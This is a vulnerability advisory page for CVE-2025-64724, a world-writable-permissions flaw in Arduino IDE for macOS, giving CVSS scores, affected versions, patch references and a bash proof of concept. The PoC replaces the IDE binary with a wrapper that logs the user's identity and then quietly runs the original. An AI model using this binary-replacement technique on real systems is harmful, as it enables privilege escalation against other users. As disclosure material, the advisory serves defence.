Security Vulnerability Report
CVE-2025-64724 CVSS 7.3 HIGH

CVE-2025-64724

Published: 2025-12-18 16:15:56
Last Modified: 2026-02-19 21:23:44

Description

Arduino IDE is an integrated development environment. Prior to version 2.3.7, Arduino IDE for macOS is installed with world-writable file permissions on sensitive application components, allowing any local user to replace legitimate files with malicious code. When another user launches the application, the malicious code executes with that user's privileges, enabling privilege escalation and unauthorized access to sensitive data. The fix is included starting from the `2.3.7` release.

CVSS Details

CVSS v3.1 (Primary)
Score: 7.3
Severity: HIGH
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
Exploitability Score: 1.3, Impact Score: 5.9

CVSS v4.0 (Secondary)
Score: 4.8
Severity: MEDIUM
Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Weakness: CWE-276 (Incorrect Default Permissions)

Configurations (Affected Products)

Affected: Arduino IDE < 2.3.7 on macOS. The NVD configuration is an AND of the two nodes below; the macOS entry is the platform condition, not a vulnerable product in itself.
cpe:2.3:a:arduino:arduino_ide:*:*:*:*:*:*:*:* (versions before 2.3.7) - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* (platform) - NOT VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-64724 PoC - Arduino IDE macOS Privilege Escalation
# This PoC demonstrates the world-writable permission vulnerability

ARDUINO_APP="/Applications/Arduino IDE.app/Contents/MacOS/Arduino IDE"
BACKUP_EXT=".backup"

# Check if Arduino IDE is installed
echo "[*] Checking if Arduino IDE is installed..."
if [ ! -f "$ARDUINO_APP" ]; then
    echo "[-] Arduino IDE not found at $ARDUINO_APP"
    exit 1
fi

# Check current file permissions (BSD stat syntax, as shipped with macOS)
echo "[*] Checking file permissions..."
PERMS=$(stat -f "%Sp" "$ARDUINO_APP")
echo "[+] Current permissions: $PERMS"

# Check if file is world-writable: test the "others write" bit (octal 002).
# Comparing the whole mode against 777 would miss modes such as 666 or 766,
# and "-w" would also fire for the owner of a correctly permissioned file.
MODE=$(stat -f "%Lp" "$ARDUINO_APP")
if [ $(( 8#$MODE & 2 )) -ne 0 ]; then
    echo "[!] VULNERABLE: File is world-writable!"
    echo "[!] An attacker can replace this file with malicious code"

    # Backup original file
    cp "$ARDUINO_APP" "${ARDUINO_APP}${BACKUP_EXT}"

    # Create replacement: a wrapper script that writes a marker line, then
    # hands over to the original binary (the heredoc is quoted, so nothing
    # is expanded here; ".backup" must match BACKUP_EXT above)
    cat > "$ARDUINO_APP" << 'EOF'
#!/bin/bash
# Malicious payload - would execute arbitrary code
# In real attack: connect back to attacker controlled server
echo "Malicious code executed with user privileges: $(whoami)" >> /tmp/arduino_exploit.log
# Execute original binary to maintain stealth
exec "${0}.backup" "$@"
EOF
    chmod +x "$ARDUINO_APP"

    echo "[+] Malicious file created"
    echo "[+] When any user launches Arduino IDE, the payload will execute"
else
    echo "[+] File is NOT world-writable (patched or secure configuration)"
fi

References

https://github.com/arduino/arduino-ide/security/advisories/GHSA-3fvj-pgqw-fgw6 (Vendor Advisory, Patch)
https://github.com/arduino/arduino-ide/pull/2805/commits/5d282f38496e96dcba02818536c0835bd684ec98 (Patch)
https://github.com/arduino/arduino-ide/releases/tag/2.3.7 (Product, Release Notes)
https://support.arduino.cc/hc/en-us/articles/24329484618652-ASEC-25-004-Arduino-IDE-v2-3-7-Resolves-Multiple-Vulnerabilities (Vendor Advisory)
